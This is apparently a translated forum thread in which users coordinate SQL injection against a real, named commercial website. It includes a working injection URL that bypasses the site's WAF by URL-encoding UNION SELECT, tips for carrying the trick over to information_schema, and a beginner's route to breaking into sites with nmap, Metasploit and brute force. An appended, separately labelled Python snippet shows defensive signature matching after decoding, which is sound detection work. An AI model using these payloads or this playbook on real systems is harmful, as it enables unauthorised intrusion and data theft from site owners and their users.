Is there a tool you can recommend other than sqlmap?
Bro, just use a tool, there are all kinds of tools; manual SQL injection is grunt work, a waste of your time.
I think there is a WAF; you need to bypass it. If I'm wrong, someone please correct me. Happy foruming...
There used to be Havij, but I don't know much about what the current tools are. I like tools that have a graphical interface like Havij and don't require a Linux distribution. I'm already exposed to enough terminal screens and code in daily life, and I get fed up with using the terminal for simple tasks, so I like tools with a GUI. If I really need something, I usually write my own tool for the purpose. Beyond that, I'm afraid I have nothing to recommend.
Is there a tool you can recommend other than sqlmap?
Well done, thank you.
I'll try it and report back.
Try putting a minus after the parameter and use a single quote instead of a double quote. Can you try lang=-eng' union select <column count> -- - ? If you put '-- -' at the end of the query, there is a high chance the server will accept it.
Mate, I'm getting the WAF protection again; this wasn't a solution. Only the column count is reachable, and the WAF kicks in on everything after that. I also looked at other MySQL DIOS queries but couldn't find a solution. I'll turn to different methods. Let me take a look at the tool our friend called Havij, maybe it will make my job easier. sqlmap takes too long, and with a manual SQL injector a wall can come up.
I'll try your suggestion tomorrow morning. You seem like a knowledgeable person; I hope this time I'll reach the solution I'm looking for. Thank you.
You forgot to add the comment, and without deleting the lang=eng part, try to catch the error starting from the id=352 or cat_page_stone part. A lot could be said from a single screenshot, but you need to give information. After adding the comment, plug this into 23 and let's see: Also don't forget, if one day you become good at manual injection, you won't much care for people who use sqlmap...
Thanks for your advice. I'm not new, but I'm trying to improve myself.
I'll try it and report back.
If you're a beginner like me, for breaking into your first website look into learning nmap; this takes a bit longer and applies to a site you're focused on. You do a port scan, and to learn the details of the open ports and get into them I recommend learning Metasploit. Apart from that, if you want to improve yourself, learning shell could be good, because shell will help you with the later steps. But if you want to try different routes, you can look at XSS. Kali's tools are generally helpful, but if the tools recommended by the folks here turn up, give them a try. There are tools related to exploits; for example XML-RPC, I saw this tool on the forum and someone was explaining it; it may work for simple sites. For searching dorks (searching on a keyword) you can also check THT's forums; a tool called Dork Scanner Main caught my eye, it may be useful to you. Apart from that, I recommend looking at plenty of site hacking guides and Batıkent's web security tutorials. Good evening.
(Footnote: a brute-force attack is generally done in Burp Suite; it's easy to use and you'll figure it out quickly. You need two things, a userlist and a passlist, but bothering with it is like rowing in vain, because it's like a game of chance, hit or miss; since every site will have different admins and passwords, I'd say it only wears out your computer.)
nmap - zenmap (both are the same thing; they do port scanning and give detailed information about open ports, such as version numbers...)
Metasploit (the step after nmap: the port's version number is found, and by entering that version number and setting the IP address you get in; you can find basic usage on the forums.)
VEGA (I have no knowledge of it; I haven't looked into this one)
Zapproxy (OWASP) (scans everything on the site and, if it finds vulnerabilities, sorts them into 3 classes: yellow flag, orange flag, red flag)
Wp-scan
W3af
Burp Suite is one of the tools that will be useful to you. I may have seemed to reduce it to the term brute force, but it isn't only for brute force; you can attempt to get into the site by trying various payloads, and it will be useful to you. I recommend you make an effort to learn XSS. Learning nmap and Metasploit is easy; only the XSS-related terms may be tiring.
Bro, is this a DIOS you wrote yourself?
Bro, how did you get this far with manual SQL? Can you show me the way?
When I put in a double quote, it automatically shows the positions of the columns, but when I try to go further the WAF protection meets me. I tried your code and worked from the places you mentioned; that too redirected to a different page. It again shows the column count but doesn't go beyond that. I'm most likely missing something somewhere, but I couldn't quite work out what I'm missing. (Lastly, when we get to the contact us section, I see that the column count there is 60, but again I can't go further.)
site:
https://sayegh.co.il/index.php?todo=cat_page_ceramic&id=-333' +and+0+ U%6e%69%6fn S%65%6c%65%63t 1,2,3,4,5,concat("Pes etmediğin sürece sorun yok."),7,8,9,10 -- -&lang=heb
No.
Bro, is this a DIOS you wrote yourself?
Bro, this union bypass isn't in HackBar, right? Where do you find it, do you write the bypass payload yourself?
No.
OK bro, thanks.
80% of the concept called bypass depends on your ability to interpret; don't reduce it to just the union part. With "U%6e%69%6fn" there isn't really a bypass in the full sense here; the HackBar you use surely has a %URL option. What matters here is that it allows the reactive parts to be interpreted. What does that mean? For example, since we got past the WAF with the union part URL-encoded, we can apply the same bypass to the information_schema part, and so on. If you want to go deeper, the remaining 20% covers the database types.
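Added example, not part of the thread: the last post observes that a signature on `union` misses `U%6e%69%6fn`, and that the same holds for an encoded `information_schema`. Seen from the defender's side, the fix for that gap is to percent-decode the query string before matching; the function names and sample query strings below are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Signatures for the two keywords the thread discusses.
SIGNATURES = [
    re.compile(r"\bunion\s+(?:all\s+)?select\b", re.IGNORECASE),
    re.compile(r"\binformation_schema\b", re.IGNORECASE),
]


def naive_match(raw_query):
    """Match on the query string exactly as received (no decoding).

    This is the behaviour the thread relies on: an encoded keyword never
    contains the literal text the signature looks for.
    """
    return any(sig.search(raw_query) for sig in SIGNATURES)


def normalize(raw_query, max_rounds=5):
    """Bring the query string to the form the application will see.

    '+' becomes a space, percent-escapes are decoded until the text stops
    changing (bounded by max_rounds), and whitespace runs are collapsed.
    """
    text = raw_query.replace("+", " ")
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return re.sub(r"\s+", " ", text).strip()


def normalized_match(raw_query):
    """Match the same signatures, but on the normalized text."""
    text = normalize(raw_query)
    return any(sig.search(text) for sig in SIGNATURES)


def triage(queries):
    """Return (query, naive_hit, normalized_hit) for each query string."""
    return [(q, naive_match(q), normalized_match(q)) for q in queries]


# Constructed sample query strings (not taken from any real log).
SAMPLE_QUERIES = [
    # Benign: the word "union" alone must not trigger.
    "todo=cat_page&id=12&q=student+union+events&lang=eng",
    # Plain keywords: both checks catch it.
    "todo=cat_page&id=-1' union select 1,2,3-- -&lang=eng",
    # Keywords percent-encoded as in the thread: only the normalized check hits.
    "todo=cat_page&id=-1'+U%6e%69%6fn+S%65%6c%65%63t+1,2,3+--+-&lang=eng",
    # Same, with information_schema also partly encoded.
    "todo=cat_page&id=-1'+U%6e%69%6fn+S%65%6c%65%63t+1,table_name"
    "+from+inf%6frmation_schema.tables+--+-&lang=eng",
]

if __name__ == "__main__":
    for query, naive_hit, normalized_hit in triage(SAMPLE_QUERIES):
        print(f"naive={naive_hit!s:5} normalized={normalized_hit!s:5} {query}")
```

Signature matching of this kind is a detection layer only; the injection itself is closed by binding the `id` and `lang` values as query parameters in the application.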